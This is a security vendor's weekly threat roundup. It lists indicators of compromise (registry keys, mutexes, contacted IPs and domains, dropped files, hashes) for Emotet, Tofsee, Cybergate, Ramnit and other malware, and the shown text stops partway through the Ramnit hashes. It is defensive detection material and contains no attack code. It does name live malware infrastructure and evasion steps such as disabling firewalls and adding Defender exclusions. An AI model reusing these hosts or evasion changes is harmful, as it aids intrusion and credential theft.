Friday, June 12, 2020

Threat Roundup for June 5 to June 12


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 5 and June 12. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, it summarizes the threats we've observed by highlighting their key behavioral characteristics and indicators of compromise, and by discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post lists only 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of a technique indicates how prevalent it is across all threat files on which dynamic analysis was conducted. Five distinct shades are used: the darkest indicates that no files exhibited the technique's behavior, and the brightest indicates that the behavior was observed in 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:
Threat Name | Type | Description
Win.Packed.Emotet-8000624-0 | Packed | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros sent as attachments on malicious emails.
Win.Dropper.Tofsee-8000771-0 | Dropper | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the overall size of the botnet under the operator's control.
Win.Malware.Cybergate-8011083-1 | Malware | Cybergate, also known as Rebhip, is a remote access trojan that allows attackers to fully control the target system. Functionality includes command shell interaction, screenshot capturing, audio/video capturing, keylogging, as well as uploading/downloading files from the target system.
Win.Dropper.Ramnit-8004725-0 | Dropper | Ramnit is a banking trojan that monitors web browser activity on an infected machine and collects login information from financial websites. It also has the ability to steal browser cookies and attempts to hide from popular antivirus software.
Doc.Dropper.Sagent-8005726-0 | Dropper | Sagent downloads and executes a binary using PowerShell from a Microsoft Word document.
Win.Dropper.Remcos-8008767-0 | Dropper | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Kuluoz-8010459-0 | Dropper | Kuluoz, sometimes known as "Asprox," is a modular remote access trojan that is also known to download and execute follow-on malware, such as fake antivirus software. Kuluoz is often delivered via spam emails pretending to be shipment delivery notifications or flight booking confirmations.
Win.Trojan.Fareit-8010489-0 | Trojan | The Fareit trojan is primarily an information stealer with the ability to download and install other malware.
Win.Trojan.Zbot-8013884-0 | Trojan | Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods such as key-logging and form-grabbing.

Threat Breakdown

Win.Packed.Emotet-8000624-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 17 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER (Value Name: 98b68e3c) 5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FXSXP32 (Value Name: Description) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMITOMI 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\KBDHE (Value Name: ImagePath) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMITOMI (Value Name: Type) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMITOMI (Value Name: Start) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMITOMI (Value Name: ErrorControl) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMITOMI (Value Name: ImagePath) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMITOMI (Value Name: DisplayName) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMITOMI (Value Name: WOW64) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TRAFFIC (Value Name: ImagePath) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMITOMI (Value Name: ObjectName) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMITOMI (Value Name: Description) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TRAFFIC (Value Name: Description) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBTUGC 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBTUGC (Value Name: Type) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBTUGC (Value Name: Start) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBTUGC (Value Name: ErrorControl) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBTUGC (Value Name: ImagePath) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBTUGC (Value Name: DisplayName) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBTUGC (Value Name: WOW64) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBTUGC (Value Name: ObjectName) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBTUGC (Value Name: Description) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TERMMGR (Value Name: ImagePath) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSFEEDSSYNC (Value Name: ImagePath) 1
Mutexes Occurrences
Global\I98B68E3C 5
Global\M98B68E3C 5
Global\Nx534F51BC 2
IP Addresses contacted by malware (does not indicate maliciousness) Occurrences
84[.]21[.]179[.]51 12
98[.]15[.]140[.]226 5
200[.]119[.]11[.]118 5
95[.]216[.]118[.]202 5
103[.]83[.]81[.]141 3
239[.]255[.]255[.]250 2
51[.]159[.]23[.]217 2
80[.]11[.]158[.]65 2
190[.]229[.]148[.]144 2
190[.]47[.]227[.]130 1
Files and/or directories created Occurrences
%SystemRoot%\SysWOW64\BWContextHandler 1
%SystemRoot%\SysWOW64\FXSXP32 1
%SystemRoot%\SysWOW64\WMVCORE 1
%SystemRoot%\SysWOW64\stclient 1
%SystemRoot%\SysWOW64\bidispl 1
%SystemRoot%\SysWOW64\DeviceUxRes 1
%SystemRoot%\SysWOW64\dinput 1
%SystemRoot%\SysWOW64\QSHVHOST 1
%SystemRoot%\SysWOW64\spopk 1
%SystemRoot%\SysWOW64\NlsData0026 1
%SystemRoot%\SysWOW64\ole2 1
%SystemRoot%\SysWOW64\dllhost 1
%SystemRoot%\SysWOW64\api-ms-win-core-timezone-l1-1-0 1
%SystemRoot%\SysWOW64\IPHLPAPI 1
%SystemRoot%\SysWOW64\mswstr10 1
%SystemRoot%\SysWOW64\WindowsAccessBridge-32 1
%SystemRoot%\SysWOW64\dxtrans 1
%ProgramData%\SwfnUY.exe 1
%ProgramData%\fTVMRHwlNGMMSS.exe 1
%ProgramData%\FDucHSCiYJfTOmHlx.exe 1

File Hashes

1663ff02929849037741e79d4a0b85f6ff5adaddc3a0e2df29dc6d66e8988274
3c3c9829356d10288efb6674c83bafca4566bb9c284e165e27fb45e738998e7c
43b322ced37400108fddbf7be482d34506cd59f1ccfd638c06eee010f1621343
48d78774374d54a4e7c49b62e75069abd2963d577149a7c654ca731d5667a40c
73e92e28013cb71464d6e9d2ceffc1953d4944737fb90ba145fa025e7037094b
779528568c766ddb20b6f05eb8d01c4833d375b4f9b7f25a65e6fd9e1bddd588
879499f69389d5c9fec8ac35666a4e15660d467deba2e55af86bc096952ae1ab
8a0e412d060eed0fa3e8d8cabd07b9447b8c75f99cd32811abd370fd83166f20
bc41a9c735419ece9cbda8a405d3c1525af114ef7f14ab9f67ecaabe0bfc1f49
d13b9acb045da3c5984728f8f2f014155aa7fba23f719891c7d8fa5d98b082ae
d93eae25ac2003e80c80d543fb6399e359f969c8389e6a15443e91527612d36a
e1e83a795b910377a93ad80d9e2832314d1b4380471bceaa241d33da9b7819d3
e8d0c1b2dd8ea9e7233fe0d6dc724492086535064b20283852188ab533e7be66
e92c6a94ba34be5bd498a6609805cfbab3753e64ecd9b6b8b773b5c4bcaa883a
f45e5a3f36690a43f6c16cc19bb21698ec4d108a6e3dafab496bf4ebdbda1270
f9a73d75181bc696e3c18f0c5f8772ff842ebe1ca156a6e892b6a50f7a34bc5c
fe7d756c4e5590cd12ba89cfaeb5ef56d2b2242e452fd5db07a71bbe6b4ca5dd

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection (images): AMP, ThreatGrid, Malware, MITRE ATT&CK


Win.Dropper.Tofsee-8000771-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 99 samples
Registry Keys Occurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 99
<HKU>\.DEFAULT\CONTROL PANEL\BUSES (Value Name: Config2) 99
<HKU>\.DEFAULT\CONTROL PANEL\BUSES (Value Name: Config0) 99
<HKU>\.DEFAULT\CONTROL PANEL\BUSES (Value Name: Config1) 99
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 91
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Type) 91
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Start) 91
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: ErrorControl) 91
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: DisplayName) 91
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: WOW64) 91
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: ObjectName) 91
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Description) 91
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: ImagePath) 39
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\rkyedlrg) 10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG (Value Name: Type) 10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG (Value Name: Start) 10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG (Value Name: ErrorControl) 10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG (Value Name: DisplayName) 10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG (Value Name: WOW64) 10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG (Value Name: ObjectName) 10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG (Value Name: Description) 10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG 10
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\fymsrzfu) 8
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\slzfemsh) 7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\ibpvucix) 6
IP Addresses contacted by malware (does not indicate maliciousness) Occurrences
239[.]255[.]255[.]250 99
43[.]231[.]4[.]7 99
69[.]55[.]5[.]252 99
85[.]114[.]134[.]88 99
217[.]172[.]179[.]54 99
5[.]9[.]72[.]48 99
130[.]0[.]232[.]208 99
144[.]76[.]108[.]82 99
185[.]253[.]217[.]20 99
45[.]90[.]34[.]87 99
172[.]217[.]15[.]100 82
47[.]43[.]26[.]7 66
104[.]47[.]59[.]161 64
157[.]240[.]18[.]174 60
188[.]125[.]72[.]73 56
104[.]47[.]54[.]36 54
104[.]47[.]53[.]36 45
69[.]168[.]97[.]77 45
52[.]11[.]241[.]224 45
208[.]84[.]244[.]10 45
67[.]195[.]204[.]80 44
64[.]8[.]71[.]111 43
63[.]240[.]178[.]216 43
62[.]42[.]230[.]22 42
69[.]172[.]200[.]235 41
*See JSON for more IOCs
Domain Names contacted by malware (does not indicate maliciousness) Occurrences
microsoft-com[.]mail[.]protection[.]outlook[.]com 99
252[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 99
252[.]5[.]55[.]69[.]in-addr[.]arpa 99
252[.]5[.]55[.]69[.]bl[.]spamcop[.]net 99
252[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 99
252[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 99
252[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 99
schema[.]org 98
ipinfo[.]io 32
api[.]sendspace[.]com 32
lh3[.]googleusercontent[.]com 17
115[.]151[.]167[.]12[.]in-addr[.]arpa 14
kedaikurma[.]com 13
pemborongkurma[.]com 12
www[.]google[.]com[.]au 11
kurmakurma[.]com 11
buahkurma[.]com 11
www[.]spoonfedsolutions[.]com 11
kurmasupplier[.]com 11
www[.]epicgames[.]com 9
banghehoaphathcm[.]com 9
www[.]ls-art[.]cn 9
in[.]godaddy[.]com 8
sso[.]godaddy[.]com 8
www[.]sendspace[.]com 8
*See JSON for more IOCs
Files and/or directories created Occurrences
%SystemRoot%\SysWOW64\config\systemprofile 99
%SystemRoot%\SysWOW64\config\systemprofile:.repos 99
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 97
%TEMP%\<random, matching '[a-z]{8}'>.exe 93
%HOMEPATH% 35
%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy) 35
%TEMP%\<random, matching '[a-z]{4,9}'>.exe 10

File Hashes

0076985696450a53bbea8c33a65c206fb0a423f73195b8540aa557373fbc08e9
01b7d4e97517113c597da6031d27f99a1ccc1d90e2de4141ec35c293bc4d10ae
034565b76c88316b1b2da3c1a565678ce8bb4ffaef3a1715e3125014d5274a00
0594b598a01de66634e2b9e5939812c6766d7cc6aa8008a2d4b3ebeecf1f3516
0691149a02a727580ac8f3333892c6c5dfb23f44a1e7be5a84fa261ce34d9e72
09c205ed43b918d8497f764176d45d4195a5e0593b61366e5c5ad92ca153d504
09d26c3c8f049e762ba8bfd0f88e45280b27dc455672cb9774749847acae3ecb
0e2d52423bea4c0769172c25a44d4d8f2b4ecb16447c40cb7c897dc762f1735a
13584698f47019e94aa1944b01b60565c9a4bcf8d8c2d2108fe56c167b4aff92
150cceed02e521de80bc00a916b873fae518dd7bdc9ba16bcecba38750c471e5
1bafd5a668dc6ab6bdf3af8728cc466539025f2821532147ac5160e7e146ca0f
1cf5999bc1adcb1a58c7a8369efe850b97bb4a76c837756e9de950bf7790617e
1e5fff1d6c62e6abbfc8484d0ceae9cfe8de65400b7eace73c3ab90572504fa9
1ef892c4cb814ba11880768b707a3632b8b3fcf55adaa2cf876d8671ba3502fe
22b5f1eb683bb548666d4ce2aae89c1e8f7dab36593a6ee9445ccd065db1fff5
26e053f0fd8e0a1c7221b2867f87e458d2e8886e393a05063ac709ad9f58fcb8
26fe3630c44570d3ee0beff0191866b70af3a994333f568710448f2d7f8eacae
28e4c63850ecdb17737ebe8e02c2d8a12eeedd1a282d256168e3af10a4e85e9f
2966f82a71874484ae39f228d9c1d3267d4276d7af1aed8054fbe20f95b745f1
29b1ae5a5a1084b47db4457e74726909138c9ced7b96aafecd82647980b75bd8
2a9cd7ed9850b9f5ba3eb630f0049db52348de9e3a5062c0287bcafa516e8dcd
2d930ffab1399aaede80a5d4793a0fbf3c0cb1c07d0e0fc7cd08a4e5253cbcc5
2df80bff6616705969af949858a8bb19d4ff472ea1ba153f1380529afe29df8e
2f6704313c252a4075d5af31679130046f08ccb6f6c6b4c948d45491852f8026
331cc2c2ff6959ae22e912712688fcf9c89efd074bdd4a167f3699c726ad205f
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection (images): AMP, ThreatGrid, MITRE ATT&CK


Win.Malware.Cybergate-8011083-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\REMOTE (Value Name: NewIdentification) 26
<HKCU>\SOFTWARE\REMOTE (Value Name: NewGroup) 26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: HKCU) 26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN (Value Name: Policies) 26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN (Value Name: Policies) 26
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: HKLM) 26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 26
<HKCU>\SOFTWARE\REMOTE 26
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{4JR57H85-2Y1A-15MG-8AV5-C323Y4D6P58X} 26
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{4JR57H85-2Y1A-15MG-8AV5-C323Y4D6P58X} (Value Name: StubPath) 26
<HKCU>\SOFTWARE\REMOTE (Value Name: FirstExecution) 26
Mutexes Occurrences
Administrator5 26
xXx_key_xXx 26
5Y3QN4A45L8W35 26
5Y3QN4A45L8W35Administrator15 26
5Y3QN4A45L8W35_SAIR 26
5Y3QN4A45L8W35_RESTART 26
Domain Names contacted by malware (does not indicate maliciousness) Occurrences
ratrat[.]no-ip[.]org 26
Files and/or directories created Occurrences
%TEMP%\Administrator7 26
%TEMP%\Administrator8 26
%TEMP%\Administrator2.txt 26
%APPDATA%\98B68E3C 26
%APPDATA%\98B68E3C\ak.tmp 26
%APPDATA%\Administrator-wchelper.dll 26
\default.html 26
%ProgramFiles(x86)%\install 26
%ProgramFiles(x86)%\install\server.exe 26

File Hashes

01b133f5e10b71f33f117a59e78836294341f26318747f5a504aa2bf2af7869c
029d9e96045543dde92fcfc3e0850a1056bfe04f583d9d83c3f187d5db2d30a6
06c9eeaf4b22ccc75f29da153dfa87ca1c3759a5bfb3b688813a07c78cf9cf5a
06dd14844f1219660dd4f18b30ff70289ece23be61938842299cbb0bdfe2cba6
11cd8e3e83744af76e4e3906f7f06a549fe7e49a6ec61a14678f25d7d01509be
1a6c0121d371ad7225ec0fd2c524979e30a57b3eef24676781cf631d704f0ec4
1cc729e873bc0ccc68b2cef59562a5196793c0511b05f952a096ce87c27bb02f
1e7963141202ea5535603b0239828a6e77613948e8e73b56f48a8d9e958c5744
1fc80523bb4a2290e683303ddad3f413079a320c0f23e055531b6ea543dcfc9c
21d5baf434ba1e61c0d24cc2c49d91e7bae8204d4a69a614dd81193ba2901a1d
243344e8c4defcf6d918ac46233381c21f2530f162962e8bf8fb384c341035be
2fd297ddc4fb433b09adb0894aa7752fc3433a360597e23c5025250cd062e801
36806975e01188ab35484d5b3e119fa74fc8feebf99d400ed5fa9ac9fbf250f6
3851caf965504e6d99ad2d541af43f8f4213c6ddaa460b8e7b812e2fdb299316
3b2a0d95b9643dcb1dfa555d9e79fbfbc27e98667014bdd79ff5b9e5c2f72c79
4876314e5d223a296b8aa95fb5eb97859da5bcbf78da9e78674b28f4536cd591
497cebdc6a2b1b3a3948f94871de8ef1c2ac64e14a4d35c73e136b1f9ed12405
4dcb2bd6dc558fb9290f40656e630190658787f29455d5c73d459f0dee312c15
5a18e22eefd2d2492491d9001ea3d258f56cb8735576b021bc1e5bc2e6a0f3da
5b3adb4375bd0075be28205ca71ddbf4276b83bbca9b66cdb9ee82bed8682891
612f9221336c5c7673f1fa6ae3e720d154089cb01a5c15265645bb89cc2b038a
64fa90ed57415dc00be6733a81c531f028324e897bc17e8b4de16f8085c4a113
6b53e1a9fb4188b1440725ffa1f282fdf9676942729324a33870461c1cfa1915
6d0ce22174d45918ad313403aaeba8d38bbe59df1af2c09d8abb00d549251458
7837bec42372c23bf413c3a6c533c88f728a73df19f36f2576a7d1424a4163b1
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection (images): AMP, ThreatGrid, MITRE ATT&CK


Win.Dropper.Ramnit-8004725-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER (Value Name: AntiVirusOverride) 15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER (Value Name: AntiVirusDisableNotify) 15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER (Value Name: FirewallDisableNotify) 15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER (Value Name: FirewallOverride) 15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER (Value Name: UpdatesDisableNotify) 15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER (Value Name: UacDisableNotify) 15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM (Value Name: EnableLUA) 15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE (Value Name: EnableFirewall) 15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE (Value Name: DoNotAllowExceptions) 15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE (Value Name: DisableNotifications) 15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC (Value Name: Start) 15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND (Value Name: Start) 15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC (Value Name: Start) 15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION (Value Name: jfghdug_ooetvtgk) 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: JudCsgdy) 15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV (Value Name: Start) 15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: Windows Defender) 15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON (Value Name: Userinit) 15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON (Value Name: Userinit) 15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Start) 11
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Type) 8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: ErrorControl) 8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: DisplayName) 8
Mutexes Occurrences
{7930D12C-1D38-EB63-89CF-4C8161B79ED4} 15
{137A1518-4964-635A-544B-7A4CB2C11D0D} 15
{137A1A2C-4964-635A-544B-7A4CB2C11D0D} 15
{137A2419-4964-635A-544B-7A4CB2C11D0D} 15
{137A1A2D-4964-635A-544B-7A4CB2C11D0D} 15
{137A1956-4964-635A-544B-7A4CB<random, matching [A-F0-9]{3}>1D0D} 15
{<random GUID>} 3
Global\8B5BAAB9E36E4507C5F5.lock 1
Global\XlAKFoxSKGOfSGOoSFOOFNOLPE 1
Global\ADAP_WMI_ENTRY 1
A16467FA7-343A2EC6-F2351354-B9A74ACF-1DC8406A 1
Local\{41435A30-AC43-1BEB-BE05-A07FD209D423} 1
A238FB802-231ABE6B-F2351354-D385FF30-098C3AB3 1
IP Addresses contacted by malware (does not indicate maliciousness) Occurrences
195[.]201[.]179[.]207 15
172[.]217[.]197[.]100/30 9
239[.]255[.]255[.]250 8
43[.]231[.]4[.]7 8
69[.]55[.]5[.]252 8
85[.]114[.]134[.]88 8
217[.]172[.]179[.]54 8
5[.]9[.]72[.]48 8
130[.]0[.]232[.]208 8
144[.]76[.]108[.]82 8
185[.]253[.]217[.]20 8
45[.]90[.]34[.]87 8
204[.]11[.]56[.]48 7
157[.]240[.]18[.]174 7
216[.]239[.]36[.]21 5
172[.]217[.]197[.]106 5
31[.]13[.]93[.]174 5
172[.]217[.]197[.]147 5
172[.]217[.]197[.]99 5
107[.]162[.]167[.]124 5
216[.]239[.]34[.]21 4
69[.]31[.]136[.]5 4
104[.]47[.]54[.]36 4
104[.]47[.]53[.]36 4
192[.]0[.]57[.]109 4
*See JSON for more IOCs
Domain Names contacted by malware (does not indicate maliciousness) Occurrences
avdltaiyjuq[.]com 7
hvkteatvnctsgrie[.]com 7
pfbewidqgfiqyiqty[.]com 7
ywsnjjpqkispu[.]com 7
tjulsbbek[.]com 7
vytjhlqwqrvh[.]com 7
yijlxkulyqfcgfecneu[.]com 7
skajloyxmlslvqkgl[.]com 7
rkwqxdlhwsbpsoiipkl[.]com 7
xvgcseraxtla[.]com 7
vxasusphxwkdktm[.]com 7
gknjlhmla[.]com 7
mgjwtsur[.]com 7
dabrtqen[.]com 7
vlnpjwrvmjqyh[.]com 7
yractfrwrctboagip[.]com 7
uhhoatxt[.]com 7
sgpyhxnpfjibwlnpvtw[.]com 7
oivkottogwc[.]com 7
vbfoafix[.]com 7
qdushgtbk[.]com 7
svncqqalq[.]com 7
tfsehgbwfav[.]com 7
dqondfminqxdaewoxy[.]com 7
vdwokjfvcttatm[.]com 7
*See JSON for more IOCs
Files and/or directories created Occurrences
%TEMP%\guewwukj.exe 15
%TEMP%\yowhywvr.exe 15
%HOMEPATH%\Local Settings\Application Data\hmqphkgx\pseqpmjy.exe 15
%HOMEPATH%\Local Settings\Application Data\jpnfmrvn.log 15
%HOMEPATH%\Start Menu\Programs\Startup\pseqpmjy.exe 15
%ProgramData%\wtvakgao.log 15
%LOCALAPPDATA%\bolpidti 15
%LOCALAPPDATA%\bolpidti\judcsgdy.exe 15
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\judcsgdy.exe 15
%TEMP%\<random, matching '[a-z]{8}'>.exe 11
%HOMEPATH% 9
%SystemRoot%\SysWOW64\config\systemprofile 8
%SystemRoot%\SysWOW64\config\systemprofile:.repos 8
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 8
%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy) 8
\$Recycle.Bin\<user SID>\$<random, matching '[A-Z0-9]{7}'>.txt 1
\$Recycle.Bin\NTHLE-DECRYPT.txt 1
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\NTHLE-DECRYPT.txt 1
%HOMEPATH%\98b689dd98b68e3c2d.lock 1
%HOMEPATH%\AppData\NTHLE-DECRYPT.txt 1
%APPDATA%\98b689dd98b68e3c2d.lock 1
%APPDATA%\Media Center Programs\NTHLE-DECRYPT.txt 1
%APPDATA%\Microsoft\Internet Explorer\NTHLE-DECRYPT.txt 1
%APPDATA%\Microsoft\Internet Explorer\Quick Launch\NTHLE-DECRYPT.txt 1
%APPDATA%\Microsoft\NTHLE-DECRYPT.txt 1
*See JSON for more IOCs

File Hashes

0b490cb9ea3ba9b59b7acc74882639791a547ce9e7d9e3215cf28661e746ee08
11f697b19a583973236c5deacfc31dd9ff441045d495a68857373b14e95f449e
151f0e9786d903c3831e7555a64b980ae7fb8514f58d1044017b82276aae0d08
21925ad39855bfa10ffc15fb35dcbfaf652ceb2b72d247b3d04e17a370bb5124
2e95a39f9ecc3f8c22b7fe785393eccc37326ccb84f984eaca9f06c51120ab1d
6a793585958d4db348868417923c49a74d6b0e053c8a914669e980a9f06901c6
6c3e1a2ae98ec30890ef5a8640f0130fa0ead136852ed5a9fe452f6ac3c01dba
75350b7659af658758e04bf2d15172e405e8cc2158dfda64bcd6a513aeee9269
75d9881c6670d6e23fc962532a6c4ae2d23f816f59f88d93131d81400dcea15b
7952e478a1c6df2378e2174e83c69608401c46526efff974484c719ba44f19dc
7a77148fafd2bb5a47ccb12d800e9d9e190554c5cb774e62dd519d19639723b4
7dec40a48b029de50868b1a85573fd1d566084d0ee4935acfb30887e30d1de06
